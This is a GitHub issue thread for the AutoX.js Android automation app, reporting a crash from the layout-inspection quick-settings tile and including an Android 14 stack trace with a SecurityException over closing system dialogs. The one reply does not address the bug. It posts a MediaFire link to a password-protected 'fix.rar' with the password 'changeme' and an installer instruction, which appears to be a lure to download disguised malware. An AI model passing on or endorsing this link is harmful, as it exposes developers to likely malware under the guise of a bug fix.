### ISSUE TITLE
qs打开布局范围分享闪退

### ISSUE THREAD

**Issue by alphime** [kkevsekk1/AutoX#1153]
1. Autox.js 版本：664
2. Autox.js 下载渠道：https://github.com/kkevsekk1/AutoX/releases
3. Android 版本：Android 10
4. Android 机型：小米10
5. Android 系统类别：MIUI
6. VSCODE  扩展版本 Auto.js-Autox.js-VSCodeExt （可选，如果是连接电脑的问题需要填）：
7. 问题描述：
8. 报错日志（可选）：

Generated by AppErrorsTracking 1.3(6)
[Android Version]: 14
[CPU ABI]: arm64-v8a
[Package Name]: org.autojs.autoxjs.v6
[Version Name]: 6.6.7
[Version Code]: 667
[Target SDK]: 34
[Min SDK]: 21
[Error Type]: JVM
[Stack Trace]:
java.lang.SecurityException: Permission Denial: android.intent.action.CLOSE_SYSTEM_DIALOGS broadcast from org.autojs.autoxjs.v6 (pid=4357, uid=10563) requires android.permission.BROADCAST_CLOSE_SYSTEM_DIALOGS.
	at android.os.Parcel.createExceptionOrNull(Parcel.java:3183)
	at android.os.Parcel.createException(Parcel.java:3167)
	at android.os.Parcel.readException(Parcel.java:3150)
	at android.os.Parcel.readException(Parcel.java:3092)
	at android.app.IActivityManager$Stub$Proxy.broadcastIntentWithFeature(IActivityManager.java:5991)
	at java.lang.reflect.Method.invoke(Native Method)
	at leakcanary.ServiceWatcher$install$4$2.invoke(ServiceWatcher.kt:93)
	at java.lang.reflect.Proxy.invoke(Proxy.java:1006)
	at $Proxy3.broadcastIntentWithFeature(Unknown Source)
	at android.app.ContextImpl.sendBroadcast(ContextImpl.java:1225)
	at android.content.ContextWrapper.sendBroadcast(ContextWrapper.java:506)
	at com.stardust.app.AppOpsKt$$ExternalSyntheticApiModelOutline0.m(D8$$SyntheticClass:0)
	at org.autojs.autojs.external.tile.LayoutInspectTileService.onClick(LayoutInspectTileService.java:52)
	at android.service.quicksettings.TileService$H.handleMessage(TileService.java:494)
	at android.os.Handler.dispatchMessage(Handler.java:107)
	at android.os.Looper.loopOnce(Looper.java:232)
	at android.os.Looper.loop(Looper.java:317)
	at android.app.ActivityThread.main(ActivityThread.java:8590)
	at java.lang.reflect.Method.invoke(Native Method)
	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:583)
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:878)
Caused by: android.os.RemoteException: Remote stack trace:
	at com.android.server.wm.ActivityTaskManagerService.checkCanCloseSystemDialogs(ActivityTaskManagerService.java:3287)
	at com.android.server.wm.ActivityTaskManagerService$LocalService.checkCanCloseSystemDialogs(ActivityTaskManagerService.java:6199)
	at com.android.server.am.ActivityManagerService.broadcastIntentLockedTraced(ActivityManagerService.java:15449)
	at com.android.server.am.ActivityManagerService.broadcastIntentLocked(ActivityManagerService.java:14936)
	at com.android.server.am.ActivityManagerService.broadcastIntentWithFeature(ActivityManagerService.java:15921)

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
